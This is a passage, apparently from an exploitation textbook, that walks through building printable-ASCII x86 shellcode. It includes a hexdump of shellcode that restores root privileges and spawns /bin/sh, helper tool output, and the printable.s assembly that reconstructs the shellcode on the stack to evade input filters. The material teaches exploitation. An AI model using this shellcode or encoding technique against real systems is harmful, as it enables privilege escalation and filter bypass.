Graphics Programs Reference
In-Depth Information
reader@hacking:~/booksrc $ gcc -o printable_helper printable_helper.c
reader@hacking:~/booksrc $ ./printable_helper 0 0x80cde189
calculating printable values to subtract from EAX..
start: 0x00000000
- 0x346d6d25
- 0x256d6d25
- 0x2557442d
-------------------
end: 0x80cde189
reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53
89
|//shh/bin..Q..S.|
00000020
e1 cd 80
|...|
00000023
reader@hacking:~/booksrc $ ./printable_helper 0x80cde189 0x53e28951
calculating printable values to subtract from EAX..
start: 0x80cde189
- 0x59316659
- 0x59667766
- 0x7a537a79
-------------------
end: 0x53e28951
r
eader@hacking:~/booksrc $
The output above shows the printable values needed to wrap the zeroed
EAX register around to
0x80cde189
(shown in bold). Next, EAX should be
wrapped around again to
0x53e28951
for the next four bytes of the shellcode
(building backwards). This process is repeated until all the shellcode is built.
The code for the entire process is shown below.
printable.s
BITS 32
push esp ; Put current ESP
pop eax ; into EAX.
sub eax,0x39393333 ; Subtract printable values
sub eax,0x72727550 ; to add 860 to EAX.
sub eax,0x54545421
push eax ; Put EAX back into ESP.
pop esp ; Effectively ESP = ESP + 860
and eax,0x454e4f4a
and eax,0x3a313035 ; Zero out EAX.
sub eax,0x346d6d25 ; Subtract printable values
sub eax,0x256d6d25 ; to make EAX = 0x80cde189.
sub eax,0x2557442d ; (last 4 bytes from shellcode.bin)
push eax ; Push these bytes to stack at ESP.
sub eax,0x59316659 ; Subtract more printable values
sub eax,0x59667766 ; to make EAX = 0x53e28951.
sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end)
